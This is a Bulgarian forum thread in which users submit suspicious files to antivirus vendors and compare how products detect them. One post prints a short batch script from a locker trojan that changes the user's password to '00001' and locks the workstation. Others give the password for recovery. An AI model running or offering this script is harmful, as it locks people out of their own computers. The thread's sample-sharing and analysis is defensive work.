Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 15

Featured Replies

При сканиране нищо,стартиране на файла:

 

Публикувано изображение

 

Пратен.

Редактирано от Гост (преглед на промените)

  • Отговори 2,7k
  • Прегледи 145,2k
  • Създадено
  • Последен отговор

 

Отпратихме го за анализ.

Абе кое средство за защита ползваш и не реагира бе?

 

IE8. :D

Касперски и той не пропусна да се издъни... Няма да се изненадам същото да направи и Комодо.

 

 

Ти пък от кога си станал вирусен специалист бе, отворко? :mad:

Редактирано от Касперски (преглед на промените)

Оказа се FP:

 

Dear Mr. Stoilov,

thank you for your request.

The file "setupHOMM5.exe" does not seem to contain malicious code. No detection will be added.

Жалко за шампиона на virusbtn

Касперски, не е нужно да си вирусен специалист и отворко - за да пробваш, стартираш и после да проверяваш дали нещо е настъпило... Всяка програма понякога е с погрешни отреагирания.  Например има ли заплаха тук  http://www.pudn.com/downloads104/sourcecode/windows/detail426557.html  Резултати https://www.virustotal.com/bg/file/ff897ebdb329d218cfa98ae68c3f21cdf57a1aa1ca9022aa42e757d6e0862b1c/analysis/1365505729/

Редактирано от NEY (преглед на промените)

Относно файла safe.exe:

 

Hello,

 

No malicious software was found in the attached file.

 

Regards, Ye Jin

Junior Virus Analyst, Kaspersky Lab.

 

 

NEY, ако ти пипне по регистрите или затрие нещо важно,без да го забележиш, какво предприемаш?

Оказа се FP:

 

Жалко за шампиона на virusbtn

 

Публикувано изображение

 

Kaspersky Security Network :)

Редактирано от Касперски (преглед на промените)

Китайските програми мълчат тук  http://r.virscan.org/report/d01a19c5735b803442e35695d5ac8125.html Изпратих го до Комодо като FP. Преди това го добавих в изключенията и го стартирах - пак отлетя в сандбокса... Иначе индийските ми програмки внимават  за възможни вписвания в регистрите - неслучайно съм ги избрал.

При такова съобщение как да не го забраниш  :P

 

Публикувано изображение

Изменя хост файла и сменя администратора.И вече нямаш достъп до уиндоуса.

Гаден вирус.

Публикувано изображение

Очаквах, че поведенческия на GData ще го закове, но уви.Заключи си го без проблем,докладван!

При такова съобщение как да не го забраниш  :P

 

Публикувано изображение

 

 Явно трябва да се забрани,четенето на системните файлове,ама ако ти бутне някой легитимен в малки ограничения може да има проблем.

 Ако може дай един шот на правилата за малките ограничения - само права.

 Мерси предварително :)

Изменя хост файла и сменя администратора.И вече нямаш достъп до уиндоуса.

Гаден вирус.

Код:

@shift 

@echo off 

net user %username% "00001" 

RUNDLL32.exe USER32.dll,LockWorkStation

Командите, които изпълнява.

BitDefender 2013 също се издъни. Обаче Аваст го блокира без проблем.

FSIS 2013 също се издъни (използва енджина на BitDefender 2013), но след доклада вече всичко е ок.. :)

Hello,


Thank you for your submission.
 
The file you submitted was found to be malicious, and is already detected as  with the Trojan antivirus database update.

Please update your virus definition databases to properly detect the file:

http://www.f-secure.com/en/web/labs_global/removal-tools/-/carousel/view/140

 

Публикувано изображение
Best regards,
--------
F-Secure Security Labs

Аз му тествах проактивната защита и нито гък.Аваст го прибира в сандъка.

Комодо и индийските му помощници също се издъниха - допуснаха поставяне на парлола при старта на ползваната ОС. Лечението е преход към свеж Win. Това е наказателен вирус - не виждам възможна полза за автора му. Освен същият да следва цел за заличаване на следи...Гаден вирус наистина.

Комодо и индийските му помощници също се издъниха - допуснаха поставяне на парлола при старта на ползваната ОС. Лечението е преход към свеж Win. Това е наказателен вирус - не виждам възможна полза за автора му. Освен същият да следва цел за заличаване на следи...Гаден вирус наистина.

Да не си се заключил?

Паролата е 

00001

Време е да сложиш това

http://www.macrium.com/reflectfree.aspx

Правиш си диск и връщаш към чиста ОС.

Или тествай под Shadow Defender.

Комодо и индийските му помощници също се издъниха - допуснаха поставяне на парлола при старта на ползваната ОС. Лечението е преход към свеж Win. Това е наказателен вирус - не виждам възможна полза за автора му. Освен същият да следва цел за заличаване на следи...Гаден вирус наистина.

 

Време е да минеш към Комодо 6,справи се без проблеми:

 

Публикувано изображение

 

Публикувано изображение

Време е да минеш към Комодо 6,справи се без проблеми:

Незнам, лично аз се отвратих от версия 6. Също така ми прецака и индексирането на файловете и бързото търсене в старт менюто не връщаше резултати и никакви фиксове от Googlе не помогнаха. Добре че още настройвам конфигурацията на системата си след смяната на процесора и не ми бе трудно да ударя 2 формата за една седмица, но поне като направя това, което искам системата ще се ползва с години с подходящ Image разбира се. ;)

 

Доста потребители от доста форуми също са против новия интерфейс. Не че не се свиква, но аз като непочитател на Sandbox-a, карах на HIPS, но там предупрежденията не ми са удобни...а правилата са отвратителни за адване...трябва да избера пътя до файла и после да го променя, а не мога направо да вкарам правилото. Не ми хареса да ми добавя и gadjet, папка shared и т.н. Не че не могат да се изключат, но това си е изцяло програма насочена към виртуализацията с два вида пясъчници - нормалния + киоск.

Не ми хареса и начина на четене на логовете от програмата - колонките все се свиват и трябва да ги разпъвам, а при местене със скрола, мести много бързо надолу и трябва да ги местя ръчно от плъзгача отстрани. Има яки неща - репутационен анализ, killswitch (който пък замени мениджъра на процесите), CCE и т.н. но прецених, че заради тези екстри не си струва да се тормозя с останалите дразнещи за мен неща.

 

В момента не съм сложил адекватна програма, но ще го тествам с HIPS-a на 5-та версия дали ще го пробие.  А и TNN, лечение има и без форматиране...а и да не говорим, че е крайно време да спреш да третираш безумни програми за оптимизация към арсенала със защитните програми. Колкото ще се доверя на Iobit, толкова и на systweak да ми пази личните данни, но твоя воля. :)

Хм, странно. В момента имам CIS6 на стар комп с Windows XP и като че ли нямам подобни проблеми с индексирането и бързото търсене. Не съм пробвал CIS6 на по-нови Windows версии и нямам намерение.

 

Ето датата на инсталация (Original Install Date) за моя Windows XP. Oсвен CIS през годините не е инсталирано нищо друго за защита.

Публикувано изображение

Публикувано изображение


 

 

Публикувано изображение

Редактирано от Гост (преглед на промените)

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.